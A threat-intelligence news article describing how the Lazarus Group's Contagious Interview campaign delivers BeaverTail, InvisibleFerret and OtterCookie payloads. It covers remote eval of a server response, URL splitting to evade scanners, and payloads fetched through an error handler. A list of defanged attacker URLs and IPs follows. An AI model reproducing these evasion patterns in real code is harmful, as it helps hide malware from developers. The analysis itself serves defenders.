Lazarus Group enhances malware delivery by using new techniques

gbhackers.com · Lucas Mancilha · 8 months ago · news
quality 7/10 · good
0 net
Tags
malware lazarus-group delivery
Lazarus Group Enhances Malware with New OtterCookie Payload Delivery Technique gbhackers. Thursday, April 9, 2026 Linkedin RSS Twitter gbhackers. Home Threats Cyber Attack Data Breach Vulnerability What is DFIR Top 10 Search Follow us On Linkedin cyber security Cyber Security News THREATS 4 min. Read Lazarus Group Enhances Malware with New OtterCookie Payload Delivery Technique By Lucas Mancilha July 30, 2025 Share Facebook Twitter Pinterest WhatsApp The Contagious Interview campaign conducted by the Lazarus Group continues to expand its capabilities. We have observed an exponential evolution in the delivery mechanisms for the campaign’s main payloads: BeaverTail, InvisibleFerret, and OtterCookie . In this article, we will discuss the innovations related to the delivery techniques used by the group and demonstrate the preservation of the group’s modus operandi throughout their code’s evolution. To this end, we analyzed 3 distinct malicious projects that were highly active in campaigns. Delivery Mechanism 1: Eval Function Figure 1 – Initial post request to the delivery domain In one of the projects, the group’s developers created and implemented a code snippet that performs a POST request to an external address named fashdefi[.]store using port 6168. After the request, the flow code captures the request’s response, stores it in the token object, and executes the content using the eval() function. Figure 2 – Execution of post request by curl command line tool In this way, the code snippet above located within the catch block prevents the main payload (in this case, ‘invisible ferret’) from needing to be written directly into the project’s main code as observed in projects prior to the analysis period of this article thereby evading previously created detection mechanisms that relied solely on direct scanning of the main code. Delivery Mechanism 2: False Token Figure 3 – Url parts declared into the project separately In a distinct project, the group implemented new strategies to complicate code analysis by automated tools used for scanning and detecting malicious code. In this code snippet, the developers took care to split the entire URL into several parts within the code. The attackers utilized the legitimate hosting service of the Vercel.App platform as a command and control (C2) server to deliver the project’s favicon. Figure 3.1 – Constant “url” to concatenate the url and constant “options” to call the entire request and headers These two constants above was developed to add more layers in the flow code for when the request be called in the function “req” which is stored in another constant named “doing”, have more chances to evade static analysis tools who rely on pattern matching and some sandbox environments who don’t analyze the code in runtime. Figure 3.2 – Constant “doing” who store the function request Following the code’s construction flow, the “doing” constant, when called, will execute the entire request operation. In the end, within the try/catch block, it uses the eval() function to receive the malicious code below: Figure 4 – Post request adding token “logo” to receive the encoded payload By using a sandbox platform, we verified the content delivered when the “bearrtoken: logo” is omitted from the request, confirming that a favicon is indeed served for the malicious project. Figure 5 – Accessing the C2 without proper token delivery the favicon of the malicious project Based on this information, we pivoted using the favicon and identified the reuse of the image across several prior projects attributed to the North Korean group and the contagious interview campaign. Figure 6 – Hunting other projects using the same favicon Delivery Mechanism 3: Try/Catch The third technique we observed demonstrates a continuous process of innovation based on elements present in previous projects. In this approach, the group utilized a much more precise design with low detection rates up to the time of this article, preserving their tactic of splitting the communication address for payload delivery to allow for subsequent URL concatenation (Delivery Mechanism 2) and using the axios library to make the request (Delivery Mechanism 1), modifying it to the GET method. Figure 7 – Using the same tactic demonstrated in images 3 and 4, to bypass pattern-matching tools As we saw in the other projects, we could expect the use of an eval() function somewhere in the code to receive and execute the main attack payload, however, on this project they implemented a curious approach. Figure 7.1 – Using same tactic demonstrated in image 5, creating a constant and storing a malicious function The developers astutely replaced the need for use an eval() function with a code block programmed to return a 500 error from the API communication. Subsequently, it receives the malicious code within the Try/Catch block, utilizing the errorHandler() function demonstrated above. So What? All the implemented innovations highlight the group’s focal point for improvements; the logic in constructing the code snippets for delivering payloads remained the same. However, the increase in innovations over a short period of time, some syntax errors present in the code, and the lack of review for these bugs suggest the constant use of artificial intelligence (AI) technologies to automate code creation. This raises significant concerns for defense mechanisms that rely only on direct code detection and pattern matching. Therefore, we can state with high confidence that in the coming months, we will see new approaches being developed to further reduce the traces left in project codes. There will be a strong focus on continuous improvement in the campaign’s delivery phase, demanding greater robustness in previously developed detection rules. Indicators of Compromise (IOCs): Urls: https[:]//cdn-static-server[.]vercel[.]app/icons/212 http[:]//fashdefi[.]store[:]6168/defy/v7 http[:]//bujey[.]store[:]6168/defy/v7’) https[:]//bitbucket[.]org/0xhpenvynb/mvp_gamba/src/master/ http[:]//chainlink-api-v3[.]cloud/api/service/token/56e15ef3b5e5f169fc063f8d3e88288e Project name: CoinLocator-main coin-promoting-app-main 0xhpenvynb-mvp_gamba-6b10f2e9dd85 IP: 144.172.96[.]35 107.189.24[.]80 135.181.123[.]177 Favicon Hash: 41ee7ddb2be173686dc3a73a49b4e93bc883ef363acca770f7ede891451122ab Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates . Tags cyber security Cyber Security News Lucas Mancilha Lucas is an Senior malware researcher. He specializes in malware analysis, reverse engineering and analysing APT Threats, also a regualar contributor at The Cyber News. Hot this week Infosec- Resources How To Access Dark Web Anonymously and know its Secretive and Mysterious Activities June 4, 2023 1 What is Deep Web The deep web, invisible web, or... SOC Architecture How to Build and Run a Security Operations Center (SOC Guide) – 2023 June 3, 2023 12 Today’s Cyber security operations center (CSOC) should have everything... Cyber Security News Network Penetration Testing Checklist – 2025 March 2, 2025 0 Network penetration testing is a cybersecurity practice that simulates... Cyber Security News Russian Hackers Bypass EDR to Deliver a Weaponized TeamViewer Component October 18, 2023 0 TeamViewer's popularity and remote access capabilities make it an... Checklist Web Server Penetration Testing Checklist – 2026 January 6, 2026 0 Web server pentesting is performed under three significant categories: identity,... Topics Acquisition Adobe Adware AI Amazon Amazon AWS AMD Android Anti Virus Antimalware Antispoofing ANY RUN Apache API Apple APT Artificial Intelligence Avast AWS Azure Backdoor Bitcoin Bluetooth Botnet Browser Buffer over flow Bug Bounty Business Chatbots ChatGPT Checklist Chrome Cisco CISO CISO Advisory Cloud Cloud Security Cloudflare Computer Security Course CPU Cross site Scripting cryptocurrency Cryptocurrency hack CVE/vulnerability Cyber Advisory Cyber AI Cyber Attack Cyber Crime cyber security Cyber security Course Cyber Security News Cyber Security Resources Dark Web Data Breach Data Governance DDOS Deals DeepSeek Discord DNS Dos Attack Drive Dropbox Education Email Email Security Ethical Hacking Exploit Exploitation Tools Extratorrents FACEBOOK Featured Firefox Firefox News Firewall Forensics Tools game GenAI GitHub GitLab Gmail Google Google dorks Governance GRC Hacking Books Hacks Hardware Hacking HBO HTML HTTP IBM IIS Incident Response Information Gathering Information Security Risks Infosec- Resources Insider Threats Instagram More CVE/vulnerability Anthropic Launches Claude Mythos Preview Focused on Zero-Day Vulnerability Discovery 0 Anthropic recently unveiled Claude Mythos Preview, a groundbreaking general-purpose... Cyber Security News Hackers Target Adobe Reader Users With Sophisticated Zero-Day Exploit 0 Security researchers at EXPMON have uncovered a highly sophisticated,... AI EvilTokens Uses Stolen Microsoft 365 Tokens, AI to Supercharge BEC 0 EvilTokens is a new Phishing-as-a-Service (PhaaS) platform that turns... CVE/vulnerability IBM Security Verify Access Flaws Let Remote Attackers Access Sensitive Data 0 IBM has issued an urgent security bulletin addressing a... Botnet Masjesu Botnet Targets Routers in Commercial DDoS Attacks 0 Hackers are abusing the Masjesu botnet to run high-volume DDoS-for-hire attacks... cyber security GreyNoise Launches C2 Detection for Exploited Edge Devices 0 GreyNoise has introduced a new capability, C2 Detection, to identify... Cyber Security News Top 10 Best Multi-Factor Authentication (MFA) Providers in 2026 0 In the digital realm of 2026, the traditional password... CVE/vulnerability Multiple OpenSSL Flaws Expose Sensitive Data in RSA KEM Handling 0 A newly disclosed flaw in OpenSSL could allow attackers... Related Articles Anthropic Launches Claude Mythos Preview Focused on Zero-Day Vulnerability Discovery CVE/vulnerability April 8, 2026 Hackers Target Adobe Reader Users With Sophisticated Zero-Day Exploit Cyber Security News April 8, 2026 EvilTokens Uses Stolen Microsoft 365 Tokens, AI to Supercharge BEC AI April 8, 2026 IBM Security Verify Access Flaws Let Remote Attackers Access Sensitive Data CVE/vulnerability April 8, 2026 Masjesu Botnet Targets Routers in Commercial DDoS Attacks Botnet April 8, 2026 Recent News Anthropic Launches Claude Mythos Preview Focused on Zero-Day Vulnerability Discovery Divya - April 8, 2026 Hackers Target Adobe Reader Users With Sophisticated Zero-Day Exploit Divya - April 8, 2026 EvilTokens Uses Stolen Microsoft 365 Tokens, AI to Supercharge BEC Mayura Kathir - April 8, 2026 IBM Security Verify Access Flaws Let Remote Attackers Access Sensitive Data Divya - April 8, 2026 Masjesu Botnet Targets Routers in Commercial DDoS Attacks Mayura Kathir - April 8, 2026 GreyNoise Launches C2 Detection for Exploited Edge Devices Mayura Kathir - April 8, 2026 gbhackers. GBHackers on Security is a top cybersecurity news platform, delivering up-to-date coverage on breaches, emerging threats, malware, vulnerabilities, and global cyber incidents. Company Advertise Vulnerability Contact Us Trending Infosec- Resources How To Access Dark Web Anonymously and know its Secretive and Mysterious Activities SOC Architecture How to Build and Run a Security Operations Center (SOC Guide) – 2023 Cyber Security News Network Penetration Testing Checklist – 2025 Categories Infosec- Resources SOC Resources What is Top 10 Advertise Vulnerability Contact Us Copyright @ 2016 - 2026 GBHackers On Security - All Rights Reserved Linkedin RSS Twitter
← Back to stories